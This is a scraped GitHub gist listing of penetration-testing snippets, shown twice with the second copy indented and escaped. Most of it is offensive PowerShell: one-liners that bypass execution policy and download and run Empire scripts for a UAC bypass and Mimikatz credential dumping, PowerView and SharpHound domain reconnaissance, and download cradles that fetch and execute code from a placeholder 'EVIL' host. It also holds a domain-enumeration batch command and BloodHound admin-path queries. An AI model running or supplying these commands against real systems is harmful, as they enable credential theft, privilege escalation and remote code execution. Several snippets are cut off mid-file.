Jason Adsit jasonadsit

## log-forwarding-with-etw.ps1
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$wc = New-Object System.Net.WebClient

if (!(Test-Path "C:\Tools")) {
    New-Item -Path "C:\" -Name "Tools" -ItemType "directory"
}

# SYSMON
# Download Sysmon
$SysmonDirectory = "C:\Tools\Sysmon\"

## DomainEnumeration.bat
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

## .htaccess
	#
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#

## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## offsec.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                jasonadsit
                / offsec.md
            
            
              Created
              March 10, 2020 03:28
                — forked from jivoi/offsec.md
            
              
                Penetrating Testing/Assessment Workflow
              
          
    Penetrating Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tip and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*

Reconnaissance

Passive/Semi-Passive

Tools


Discover - https://github.com/leebaird/discover


## gist:ed37163134b1be7e3ee66a1b8006707b
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer
RETURN u.name

That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
---------------

MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,

## RedTeam_CheatSheet.ps1
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

## WinRM_Cheat_Sheet.ps1
try {
    $null = Enable-PSRemoting -Force -ErrorAction Stop
}
catch {
    $null = Get-NetConnectionProfile | Where-Object {$_.NetworkCategory -eq 'Public'} | Set-NetConnectionProfile -NetworkCategory 'Private'

    try {
        $null = Enable-PSRemoting -Force -ErrorAction Stop
    }
    catch {

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
	$wc = New-Object System.Net.WebClient

	if (!(Test-Path "C:\Tools")) {
	New-Item -Path "C:\" -Name "Tools" -ItemType "directory"
	}

	# SYSMON
	# Download Sysmon
	$SysmonDirectory = "C:\Tools\Sysmon\"
	#
	# TO-DO: set \|DESTINATIONURL\| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	#
	# Include /etc/apache2/redirect.rules
	#
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands
	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,
	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
	try {
	$null = Enable-PSRemoting -Force -ErrorAction Stop
	}
	catch {
	$null = Get-NetConnectionProfile \| Where-Object {$_.NetworkCategory -eq 'Public'} \| Set-NetConnectionProfile -NetworkCategory 'Private'

	try {
	$null = Enable-PSRemoting -Force -ErrorAction Stop
	}
	catch {
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set